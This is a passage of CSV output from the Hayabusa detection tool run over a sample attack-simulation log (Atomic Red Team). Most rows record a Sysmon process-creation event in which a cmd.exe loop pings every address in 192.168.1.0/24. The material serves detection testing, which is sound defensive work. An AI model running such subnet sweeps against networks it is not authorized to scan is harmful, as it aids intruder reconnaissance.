192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process 